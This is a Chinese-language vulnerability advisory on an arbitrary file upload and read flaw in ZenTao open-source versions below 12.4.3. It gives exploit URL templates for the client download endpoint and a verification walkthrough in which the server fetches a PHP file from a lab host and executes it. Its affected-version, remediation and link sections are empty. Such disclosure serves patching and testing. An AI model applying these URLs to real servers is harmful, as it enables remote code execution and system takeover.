禅道项目管理系统(开源版)任意文件上传漏洞通告
1. 漏洞类型:
| TAG: |
zentao、任意文件上传 |
| 危害等级: |
高 |
| 应急等级: |
黄色 |
2. 漏洞影响:
近日,禅道官网发布了12.4.3版本更新公告,修复了一个文件上传的漏洞,对应CNVD编号:CNVD-C-2020-121325。根据公告,在禅道开源版低于12.4.3版本中存在任意文件读取和任意文件上传漏洞,恶意攻击者(需要登陆后台的任意用户)可以通过fopen/fread/fwrite方法结合file、http、ftp等协议,读取或上传任意文件,成功利用漏洞后可获得目标系统中敏感文件读取和系统管理权限,建议尽快测试漏洞修复的版本并及时升级。
3. 受影响版本:
4. 漏洞解析:
测试URL
http://[域名]/www/client-download-[版本参数]-[base64加密后的恶意文件地址].html
http://[域名]/www/index.php?m=client&f=download&version=[ 版本参数]&link=[ base64加密后的恶意文件地址]
检测过程:
根据实验环境,准备的恶意文件地址为http://192.168.6.1/test.php
test.php内容如下:(意为执行phpinfo,查看php配置信息)
使用base64加密恶意文件地址
登录禅道后台,使用其中一个测试URL进行测试,将相对应的参数填写正确
在文件上传位置zentaopms\www\data\client\1232查看上传的文件,在浏览器访问上传成功的test.php文件,恶意代码已经成功执行,代表存在任意文件上传漏洞。
如果在禅道项目管理系统下没有找到上传的恶意文件,则说明不存在任意文件上传漏洞。
5. 防护建议:
6. 相关链接:
